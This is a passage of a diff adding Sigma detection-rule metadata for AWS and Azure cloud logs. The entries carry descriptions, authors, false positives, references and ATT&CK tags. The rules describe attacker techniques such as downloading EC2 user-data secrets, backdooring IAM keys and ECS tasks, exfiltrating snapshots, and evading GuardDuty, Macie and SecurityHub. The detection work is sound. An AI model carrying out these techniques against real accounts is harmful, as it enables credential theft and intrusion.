EC2 instances. Instance User Data may include installation scripts and hard-coded secrets for deployment.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/11", + "falsepositive": [ + "Assets management software like device42" + ], + "filename": "aws_ec2_download_userdata.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__download_userdata/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_download_userdata.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "26ff4080-194e-47e7-9889-ef7602efed0c", + "value": "AWS EC2 Download Userdata" + }, + { + "description": "Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Valid changes to the startup script" + ], + "filename": "aws_ec2_startup_script_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_startup_script_change.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.t1059.004" + ] + }, + "uuid": "1ab3c5ed-5baf-417b-bb6b-78ca33f6c3df", + "value": "AWS EC2 Startup Shell Script Change" + }, + { + "description": "An attempt to export an AWS EC2 instance has been detected. A VM Export might indicate an attempt to extract information from an instance.", + "meta": { + "author": "Diogo Braz", + "creation_date": "2020/04/16", + "falsepositive": "No established falsepositives", + "filename": "aws_ec2_vm_export_failure.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/vm-import/latest/userguide/vmexport.html#export-instance", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ec2_vm_export_failure.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005", + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "54b9a76a-3c71-4673-b4b3-2edb4566ea7b", + "value": "AWS EC2 VM Export Failure" + }, + { + "description": "Detects when an Elastic Container Service (ECS) Task Definition has been modified and run.\nThis can indicate an adversary adding a backdoor to establish persistence or escalate privileges.\nThis rule is based on examining events created upon execution of Rhino Security Lab's Pacu in a lab environment.\n", + "meta": { + "author": "Darin Smith", + "creation_date": "2022/06/07", + "falsepositive": [ + "Task Definition being modified to request credentials from the Task Metadata Service for valid reasons" + ], + "filename": "aws_ecs_task_definition_backdoor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", + "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", + "https://attack.mitre.org/techniques/T1525", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1525" + ] + }, + "uuid": "b94bf91e-c2bf-4047-9c43-c6810f43baad", + "value": "AWS ECS Backdoor Task Definition" + }, + { + "description": "Detects when a EFS Fileshare is modified or deleted.\nYou can't delete a file system that is in use.\nIf the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.\n", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_efs_fileshare_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteFileSystem.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "25cb1ba1-8a19-4a23-a198-d252664c8cef", + "value": "AWS EFS Fileshare Modified or Deleted" + }, + { + "description": "Detects when a EFS Fileshare Mount is modified or deleted. An adversary breaking any file system using the mount target that is being deleted, which might disrupt instances or applications using those mounts.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_efs_fileshare_mount_modified_or_deleted.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/efs/latest/ug/API_DeleteMountTarget.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_efs_fileshare_mount_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "6a7ba45c-63d8-473e-9736-2eaabff79964", + "value": "AWS EFS Fileshare Mount Modified or Deleted" + }, + { + "description": "Identifies when an EKS cluster is created or deleted.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/08/16", + "falsepositive": [ + "EKS Cluster being created or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "EKS Cluster created or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_eks_cluster_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://any-api.com/amazonaws_com/eks/docs/API_Description", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", + "value": "AWS EKS Cluster Created or Deleted" + }, + { + "description": "Detects when an ElastiCache security group has been created.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_elasticache_security_group_created.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136", + "attack.t1136.003" + ] + }, + "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", + "value": "AWS ElastiCache Security Group Created" + }, + { + "description": "Identifies when an ElastiCache security group has been modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_elasticache_security_group_modified_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", + "value": "AWS ElastiCache Security Group Modified or Deleted" + }, + { + "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.", + "meta": { + "author": "toffeebr33k", + "creation_date": "2020/11/21", + "falsepositive": [ + "AWS Config or other configuration scanning activities" + ], + "filename": "aws_enum_listing.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1592" + ] + }, + "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", + "value": "Account Enumeration on AWS" + }, + { + "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/11", + "falsepositive": [ + "Valid change in the GuardDuty (e.g. to ignore internal scanners)" + ], + "filename": "aws_guardduty_disruption.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", + "value": "AWS GuardDuty Important Change" + }, + { + "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", + "AWS API keys legitimate exchange workflows" + ], + "filename": "aws_iam_backdoor_users_keys.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", + "value": "AWS IAM Backdoor Users Keys" + }, + { + "description": "Detects when an user creates or invokes a lambda function.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/03", + "falsepositive": [ + "Lambda Function created or invoked may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_lambda_function_created_or_invoked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "d914951b-52c8-485f-875e-86abab710c0b", + "value": "AWS Lambda Function Created or Invoked" + }, + { + "description": "Detects evade to Macie detection.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/07/06", + "falsepositive": [ + "System or Network administrator behaviors" + ], + "filename": "aws_macic_evasion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/macie/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221", + "value": "AWS Macie Evasion" + }, + { + "description": "Detects possible suspicious glue development endpoint activity.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/03", + "falsepositive": [ + "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_passed_role_to_glue_development_endpoint.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", + "value": "AWS Glue Development Endpoint Activity" + }, + { + "description": "Detects the change of database master password. It may be a part of data exfiltration.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Benign changes to a db instance" + ], + "filename": "aws_rds_change_master_password.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", + "value": "AWS RDS Master Password Change" + }, + { + "description": "Detects the recovery of a new public database instance from a snapshot. It may be a part of data exfiltration.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_rds_public_db_restore.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", + "value": "Restore Public AWS RDS Instance" + }, + { + "description": "Detects AWS root account usage", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" + ], + "filename": "aws_root_account_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078.004" + ] + }, + "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", + "value": "AWS Root Credentials" + }, + { + "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", + "meta": { + "author": "Elastic, Austin Songer @austinsonger", + "creation_date": "2021/07/22", + "falsepositive": [ + "A domain transfer lock may be disabled by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_route_53_domain_transferred_lock_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ] + }, + "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", + "value": "AWS Route 53 Domain Transfer Lock Disabled" + }, + { + "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", + "meta": { + "author": "Elastic, Austin Songer @austinsonger", + "creation_date": "2021/07/22", + "falsepositive": [ + "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_route_53_domain_transferred_to_another_account.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ] + }, + "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", + "value": "AWS Route 53 Domain Transferred to Another Account" + }, + { + "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_s3_data_management_tampering.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", + "value": "AWS S3 Data Management Tampering" + }, + { + "description": "Detects the modification of the findings on SecurityHub.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/28", + "falsepositive": [ + "System or Network administrator behaviors", + "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." + ], + "filename": "aws_securityhub_finding_evasion.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", + "value": "AWS SecurityHub Findings Evasion" + }, + { + "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", + "meta": { + "author": "Darin Smith", + "creation_date": "2021/05/17", + "falsepositive": [ + "Valid change to a snapshot's permissions" + ], + "filename": "aws_snapshot_backup_exfiltration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://www.justice.gov/file/1080281/download", + "https://attack.mitre.org/techniques/T1537/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", + "value": "AWS Snapshot Backup Exfiltration" + }, + { + "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", + "Automated processes that uses Terraform may lead to false positives." + ], + "filename": "aws_sts_assumerole_misuse.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1214", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", + "value": "AWS STS AssumeRole Misuse" + }, + { + "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_sts_getsessiontoken_misuse.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1213", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", + "value": "AWS STS GetSessionToken Misuse" + }, + { + "description": "Identifies when suspicious SAML activity has occurred in AWS. An adversary could gain backdoor access via SAML.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/22", + "falsepositive": [ + "Automated processes that uses Terraform may lead to false positives.", + "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_susp_saml_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078", + "attack.lateral_movement", + "attack.t1548", + "attack.privilege_escalation", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", + "value": "AWS Suspicious SAML Activity" + }, + { + "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", + "meta": { + "author": "toffeebr33k", + "creation_date": "2021/08/09", + "falsepositive": [ + "Legit User Account Administration" + ], + "filename": "aws_update_login_profile.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", + "value": "AWS User Login Profile Was Modified" + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Legitimate AD FS servers added to an AAD Health AD FS service instance" + ], + "filename": "azure_aadhybridhealth_adfs_new_server.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578" + ] + }, + "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", + "value": "Azure Active Directory Hybrid Health AD FS New Server" + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Legitimate AAD Health AD FS service instances being deleted in a tenant" + ], + "filename": "azure_aadhybridhealth_adfs_service_delete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578.003" + ] + }, + "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", + "value": "Azure Active Directory Hybrid Health AD FS Service Delete" + }, + { + "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/19", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", + "value": "CA Policy Removed by Non Approved Actor" + }, + { + "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? Review Modified Properties and compare \"old\" vs \"new\" value.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/19", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", + "value": "CA Policy Updated by Non Approved Actor" + }, + { + "description": "Monitor and alert on conditional access changes.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/18", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", + "value": "New CA Policy by Non-approved Actor" + }, + { + "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/04/21", + "falsepositive": [ + "Failed Azure AD Connect Synchronization", + "Service account use with an incorrect password specified", + "Misconfigured systems", + "Vulnerability scanners" + ], + "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", + "value": "Sign-in Failure Bad Password Threshold" + }, + { + "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_account_lockout.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", + "value": "Account Lockout" + }, + { + "description": "Detects when an account was created and deleted in a short period of time.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim 